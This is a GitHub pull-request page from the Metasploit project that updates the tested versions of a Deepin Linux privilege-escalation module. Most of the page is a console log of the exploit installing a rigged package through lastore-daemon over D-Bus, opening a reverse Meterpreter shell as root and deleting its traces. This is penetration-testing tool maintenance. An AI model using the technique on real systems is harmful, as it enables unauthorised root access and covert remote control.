New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Update lastore_daemon_dbus_priv_esc tested versions #10745

Merged
merged 1 commit into from Oct 5, 2018

Conversation

Projects
None yet
3 participants
@bcoles
Contributor

bcoles commented Oct 4, 2018

Update lastore_daemon_dbus_priv_esc module tested versions.

msf5 exploit(linux/local/lastore_daemon_dbus_priv_esc) > rexploit 
[*] Reloading module...

[*] Started reverse TCP handler on 172.16.191.196:4444 
[+] lastore-daemon is installed
[+] dpkg-deb is installed
[+] dbus-send is installed
[+] User is permitted to install packages
[*] Building package...
[*] Creating '/tmp/.Rtebwm3IGr/DEBIAN' directory
[*] Writing '/tmp/.Rtebwm3IGr/DEBIAN/control' (98 bytes) ...
[*] Writing '/tmp/.Rtebwm3IGr/DEBIAN/postinst' (29 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/.nPVHj5ZrFWe' (249 bytes) ...
[*] Installing package...
method return time=1538686233.940189 sender=:1.64 -> destination=:1.71 serial=72 reply_serial=2
   object path "/com/deepin/lastore/Job2install"
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (816260 bytes) to 172.16.191.142
[+] Deleted /tmp/.Rtebwm3IGr/DEBIAN/control
[+] Deleted /tmp/.Rtebwm3IGr/DEBIAN/postinst
[+] Deleted /tmp/.nPVHj5ZrFWe
[+] Deleted /tmp/.Rtebwm3IGr/DEBIAN
[*] Removing package...
method return time=1538686249.603270 sender=:1.64 -> destination=:1.72 serial=148 reply_serial=2
   object path "/com/deepin/lastore/Job3remove"

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
smeterpreter > sysinfo
Computer     : 172.16.191.142
OS           : Deepin 15.7 (Linux 4.15.0-29deepin-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 

@busterb busterb self-assigned this Oct 5, 2018

@busterb busterb merged commit fe7ce02 into rapid7:master Oct 5, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

busterb added a commit that referenced this pull request Oct 5, 2018

@busterb

This comment has been minimized.

Show comment
Hide comment
@busterb

busterb Oct 5, 2018

Contributor

Thanks for the update @bcoles

Contributor

busterb commented Oct 5, 2018

Thanks for the update @bcoles

msjenkins-r7 added a commit that referenced this pull request Oct 5, 2018

@busterb

This comment has been minimized.

Show comment
Hide comment
@busterb

busterb Oct 5, 2018

Contributor

Release Notes

This expands the number of verified vulnerable versions of the lastore-daemon service, which allows arbitrary package installation without authentication on Deepin Linux.

Contributor

busterb commented Oct 5, 2018

Release Notes

This expands the number of verified vulnerable versions of the lastore-daemon service, which allows arbitrary package installation without authentication on Deepin Linux.

@bcoles bcoles deleted the bcoles:lastore_daemon_dbus_priv_esc branch Oct 5, 2018

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment